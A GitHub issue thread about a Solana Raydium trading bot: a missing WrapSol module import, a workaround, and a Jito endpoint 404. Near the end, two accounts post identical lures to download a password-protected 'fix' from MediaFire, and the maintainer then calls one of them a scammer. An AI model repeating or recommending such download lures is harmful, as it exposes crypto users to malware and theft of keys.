### ISSUE TITLE
 No module named 'WrapSol'

### ISSUE THREAD

**Issue by Cyberlion2024** [henrytirla/Solana-Raydium-Trading#9]
Good evening, first of all thank you for this project, excuse me but maybe i am not understaning how to make it work, i downloaded the project and configured the .env inside jito, installed all dependencies and launched buy_with_jito.py and it gives me that error raydium-buy-sell\Jito\utils\create_close_account.py", line 6, in <module>
    from WrapSol.utils.layouts import SWAP_LAYOUT
ModuleNotFoundError: No module named 'WrapSol'

how can i solve? thank you

**Comment by henrytirla** [comment]
Everything should work fine. No module Wrapsol implies the import of Wrapsol file can't be found it needs to be in the same directory

**Comment by Cyberlion2024** [comment]
Good evening, thank you for the reply, i alredy executed the buy script from the Jito folder after the setup of .env file and this is the output \Jito\buy_with_jito.py", line 28, in <module>
    from utils.create_close_account import  fetch_pool_keys, get_token_account, make_swap_instruction
  File "C:\Users\bash\AppData\Local\Programs\Python\Python312\bot_sniper_finale\gmgn\raydium-buy-sell\Jito\utils\create_close_account.py", line 6, in <module>
    from WrapSol.utils.layouts import SWAP_LAYOUT
ModuleNotFoundError: No module named 'WrapSol'

Kind regards

**Comment by henrytirla** [comment]
Add this to your utils folder  SWAP_LAYOUT = cStruct(
    "instruction" / Int8ul, "amount_in" / Int64ul, "min_amount_out" / Int64ul
)
 and comment out 
<img width="462" alt="image" src="https://github.com/user-attachments/assets/7f2dfa31-eb47-403e-9877-1d0578eb8d2b">

**Comment by henrytirla** [comment]
the issue is it calls this import from the wrapsol folder which you probably don't have in that directory

**Comment by Cyberlion2024** [comment]
I tried but is not working, i literally just downloaded the project, installed the requirements and launched the buy_with_jito.py from Jito folder after the setup of .env, i can see the WrapSol folder 
![image](https://github.com/user-attachments/assets/4d15fd21-0ec9-4490-9a60-ae4813726c5a)

**Comment by henrytirla** [comment]
it should work it imports it from the WrapSol folder. Either way i suggest you do one of the alternatives i proposed above

**Comment by Cyberlion2024** [comment]
I managed to solve that problem adding from .WrapSol.utils.layouts import SWAP_LAYOUT and copying the WrapSol inside utils folder, after that i inserted in the pool_information that from .layouts import AMM_INFO_LAYOUT_V4_1, MARKET_LAYOUT, get_offset and now it works but i have that error .\buy_with_jito.py
BDWcCQvMERgJz4dRrG7YXSHV6ELCKXuEEerqDaMmCm5P
Response: EPEP
Unhandled exception: . Retrying...
Failed to confirm transaction after maximum retries.

**Comment by henrytirla** [comment]
This new error is normal your transaction has not been confirmed if you are tipping a jito validator it should be faster

**Comment by Cyberlion2024** [comment]
it seems due to jito     raise HTTPStatusError(message, request=request, response=self)
httpx.HTTPStatusError: Client error '404 Not Found' for url 'https://amsterdam.mainnet.block-engine.jito.wtf'
For more information check: https://httpstatuses.com/404 no one of the jito mainnet seems to work, or i missed something in the .env, is it correct? RPC_HTTPS_URL="https://amsterdam.mainnet.block-engine.jito.wtf"
PrivateKey="myprivatekey"
WSOL_TokenAccount="mywalletaddress"
JITO_PRIVATE_KEY="myprivatekey"
TIP_ACCOUNT_PUBKEY="Cw8CFyM9FkoMi7K7Crf6HNQqf4uEMzpKw6QNghXLvLkY"

Thank you for your support

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by henrytirla** [comment]
@Cyberlion2024 D0 NOT download anything @ahmar7 is a scammer

**Comment by Cyberlion2024** [comment]
Thank you henrytirla for the advice 👍🏻

Il mar 27 ago 2024, 09:57 henrytirla ***@***.***> ha scritto:
